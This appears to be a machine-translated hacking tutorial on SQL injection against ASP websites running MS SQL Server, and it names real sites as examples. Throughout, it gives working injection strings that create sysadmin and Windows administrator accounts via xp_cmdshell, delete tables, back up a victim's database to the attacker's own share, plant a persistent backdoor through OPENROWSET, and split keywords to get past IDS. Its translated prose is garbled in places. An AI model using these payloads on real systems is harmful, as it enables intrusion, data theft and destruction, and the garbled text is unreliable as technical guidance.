For many news, BBS and e-commerce websites use ASP SQL design, and many programmers who write ASP (there are many new graduation), so ASP SQL's attack success rate is also relatively high. This type of attack method and NT version and SQL version have no big relationship, and there is no corresponding patch because the vulnerability is caused by the programmer, and most of the books of the ASP programming, the source code example has this vulnerability In fact, only some legal ASP requests for SQL, leave after the suffering! This kind of attack method originated from OR1 = 1 vulnerability (we call it for a vulnerability), this vulnerability, I think everyone should know, then, then, the execove is; exec Sp_addlogin Hax (in the database Add a HAX user), but this method is limited. First, the SQL Server account used by the ASP is an administrator. Secondly, the submission variable is the final sum of the entire SQL statement, because some programmers use Select * from news where id = ... and Topic = ... and ..... This method requests the database, then if you still use the above example, you will news.asp? Id = 2; exec sp_addlogin HAX becomes SELECT * from news where id = 2; EXEC SP_ADDLOGIN HAX and TOPIC = ... and ... The entire SQL statement has an AND and judgment existence after executing sp_addlogin's stored procedure, syntax error, your sp_addlogin naturally does not work normally, so try to see the following method News.asp? id = 2; exec sp_addlogin Hax; - Back - symbols turn sp_addlogin's judgment statement into a comment, so there is no syntax error, sp_addlogin is executed normally! So let's use the news.asp? Id = 2; exec master.dbo.sp_addlogin hax; - news.asp? Id = 2; exec master.dbo.sp_password null, Hax, Hax; - News.asp ? id = 2; exec master.dbo.sp_addsrvrolemember sysadmin Hax; - news.asp? id = 2; exec master.dbo.xp_cmdshell net user Hax / Workstations: * / Times: ALL / Passwordchg: Yes / PasswordReq: YES / Active: Yes / Add; - News.asp? id = 2; exec master.dbo.xp_cmdshell net localgroup administrators Hax / add; - This left HAX administrator account in his database and system. Of course, the prerequisites are ASPs to use the administrator account, so don't tried the virtual space, there will be no such loopholes. We will discuss, if the other ASP is not using the SQL administrator account, we invaded, of course, the invasion of the 1433 port will of course, you can try to look at the ID = 2 and a symbol, mainly see how the other party ASP Written again to talk about how we do when the SQL account used by the ASP program is not administrator.
For example, the main page of the sky, there is news content, as follows: http://www.talent.com.cn/news/news-2.asp?newid=117 You can try to see http://www.talentitit.com. CN / News / NEWS-2.ASP? NewID = 117; SELECT 123; - Oh, newspaper syntax error, SELECT 123 error, obvious Www.talentitit.com.cn/news/news-2.asp?newid=117; Delete News; - Haha, I think as long as the name is guess, the news base is deleted, the SQL account used by the ASP is not The administrator will also be an Owner of a database. At least for this library has high management privileges but we don't know how the library is? Take a look at the db_name () function Open your query analyzer, take a look at Print DB_Name (), huh, the current database name comes out with subclass, as follows: declare @a sysname; set @ a = db_name (); Backup Database @a to disk = Your IP Your shared directory Bak.dat, Name = TEST; - Oh, his current database back up to your hard disk, you have to do it. This method can find the other's SQL IP first firewall, open ICMP and 139TCP and 445TCP warning tips and try to see news.asp? Id = 2; exec master.dbo.xp_cmdshell ping Your IP If the firewall prompts you ping you Then, because the ASP that can be sure the other party is SQL administrator privilege, it also determines the exact location of the other side SQL Server, because many big sites consider performance, will be a Web service and database, when the other party When the patch does not see the source code, I think only this method can quickly locate the other side's SQL Server location, if the other ASP does not have SQL administrator privileges, we can't call xp_cmdshell, what should I do? Don't worry, try to see this news.asp? Id = 2; declare @a; set @ a = db_name (); Backup Database @a to disk = Your IP Your shared directory Bak.dat, Name = test; Oh, your firewall should make a warning, some people connect your 445 or 139 (Win9 port, so that the other SQL IP can also expose if the other database is not Owner, what should we do? ? Next time I will tell you a better way.
In fact, Backuo Database is still a bit exaggerated. If the other database is very large, you are dialing Internet, huh, huh, persuade you to do not try, it is difficult to successfully transfer, we will talk about how to deceive IDS to perform ASP SQL intrusion currently has some good ids that has begun to monitor the XP_cmdshell. These keywords are good. Comrades Next time all the above URL I hope everyone will submit through VBScript, because the browser's address bar will block some special characters, so your command cannot Complete transmission of window.location.herf = url supplements: This issue has also been raised on the web, but only some simple XP_cmdshell calls are limited, in fact, there are many places worth in-depth, such as www.guosen.com. CN. There is this problem with the national agency certificate, and they use the three-story structure of the MS to use the XP_cmdshell approach to the previous XP_cmdshell, and the string will be filtered, but I tried, the use of SQL's heterogeneous requests can still be on the other. Machine Open the account of Telnet service and administrators group! Since the other firewall is very close CheckPoint Datasters, only open 80 ports, there is therefore difficult to get his database structure, but there is still a way to do: p By the way reminds everyone to pay attention to SQLOLEDB, DB_NAME, OpenRowSet, OpenDataSource These system functions When the ASP's SQL Server account is just a normal user, they will be useful! SQL Server New Vulnerability and Some Breakfasts I have to talk about some SQL Server new bugs, although I have been working hard, of course, I have a little lucky component, I can find it, I don't dare to enjoy alone, take it out, please Identification, of course, it is likely to have some masters already know, after all, I have been in contact with SQL Server for less than 1 year: P1. About OpenRowSet and OpenDataSource may have already a skill, that is, using OpenRowSet to send local commands usually our usage is (including MSDN's list) as follows Select * from OpenRowSet (SQLOLDB, MyServer; sa; select * from table) visible (SELECT * from shop Even from the literal sense) OpenRowSet is just as a fast remote database access, it must follow the select, that is, what we need to return a recordset, then can we use it to call XP_cmdshell? The answer is yes! Select * from OpenRowSet (SQLOLEDB, Server; SA;, SET FMTONLY OFF EXECMASTER.DBO.XP_CMDSHELL DIR C: /) must add SET FMTONLY OFF to block the setting of the default only return column information, so the output collection of XP_cmdshell returns Will be submitted to the previous Select display, if the default settings are used, return empty sets causes the select error, and the command will not be executed.
So if we want to call sp_addlogin, he will not return any collection as XP_cmdshell, we can no longer rely on FMTONLY, you can operate as the following SELECT * from OpenRowSet (SQLOLEDB, Server; Sa; SELECT OK! EXECMASTER.DBO.SP_ADDLOGIN HECTIC) This will return at least the collection of select ok!, Your machine chamber shows OK! And the other's database will also add a hectic account, that is, we use Select OK! Return to the collection to deceive the local SELECT request, is the command can be performed normally, which is the same for sp_addsrvrolemember and OpenDataSource you can do this! As for the true use of this method, everyone thinks: P 2. Regarding the question of MSDasql twice, I don't know if you have tried the MSDasql connection remote database. Of course, this API must be administrator of SQLServer to call, then select * from openrowset (msdasql, driver = {sql server}; server = server; address = server, 1433; uid = sa; pwd =; data = master; network = dbmsoCN, SELECT * home1 select * from table2) When the number of fields of Table1 and Table2 is not the same, you will find each other's SQLServer Crash, even the local connection will fail, and the system resource takes everything, after killing the SQL Server process with pskill, if the machine is not restarted, SQL Server does not start normally, or often illegal operation, I just happen to find this bug. I haven't touched it in the specific reason, and it is very strange that this phenomenon only appears on SDASQL. Sqloledb has no such problem. It seems that the problem is not to ask the number of collections and the number of returns do not match. It should still be MSDasql itself. For specific reasons, everyone will study together: P 3. The terrible back door has seen someone on the Internet. Some people say that after SQL Server can do it by adding Triger, Jobs, or rewriting sp_addlogin and sp_addsrvroleMember, these methods are of course feasible, but it is easy to be discovered. I don't know if you have thought about the local connection map of SQLOLOLDB. Oh, such as you execute the following command * from openrowset with SQL Server administrator account on each other's SQL Server, Data Source = Hect, Set Fmtonly Off Exec Master " The local connection map named hectic is established on the other's SQL Server. As long as SQL Server does not restart, this mapping will always exist, at least I don't know how to find the connection mapped by others, well, the above command has run, You will find that the guest user without any permissions, running the above command! And the permissions are Localsystem! (Default installation) huh! This method can be used to leave a back door with SQL Server that has been invaded by administrator privileges.
The above method passes on SQL Server2000 SQLServer 200SP1! * There is another guess. I don't know if you haven't pay more attention to the two DSNs included with Windows. One is the LocalServer one is MSQi. These two are the local administrator account connection SQLServer, if the other party's SQL Server is By starting with custom Power User, the permissions of SA are like Power User, it is difficult to make a big, but we pass the following command Select * from OpenRowSet (Msdasql, DSN = LocaserVer; Trusted_Connection = YES, Set Fmtonly Off Exec MASTER..XP_CMDSHELL DIR C: /) The local SQLServer should be used to connect the local SQLServer account, and then perform local commands with this account, this is, I think it should be able to break through the SA That Power User authority. The current problem is that SQLOLEDB cannot call the DSN connection, and the MSDasql non-administrator does not let the call, so I am looking for the method of guest call MSDasql. If someone knows how this bug breaks through, or there is a new idea, we can discuss it together, This distribution can be used in successful use of Guest, it will be a very serious security vulnerability. Because any SQL statement we mentioned earlier can be submitted to the other party's ASP to help us execute: p Use T-SQL to deceive IDS or attack IDS now IDS has become more and smarter. Ids added XP_CMDSHELL SP_ADDLOGIN Surveillance, but after all, there is no such thing as artificial intelligence, this surveillance always has a feeling of deceived ids: IDS: Ids Since monitoring xp_cmdshell keywords, then we can do Declare @a sysname set @ a = "XP_ " " cmdshell "EXEC @a Dir C: / This code is like everyone can understand, and XP_cmdshell as a Store Procedure has a ID number in the Master library, fixed, we can also assume this ID = 988456 declare @a sysname select @ a = name from sysobjects where id = 988456 exec @a dir c: / course also possible to declare @a sysname select @ a = name from sysobjects where id = 988455 1 exec @a dir c: / This approach is arranged in combination, and IDS is not possible to do full monitoring.
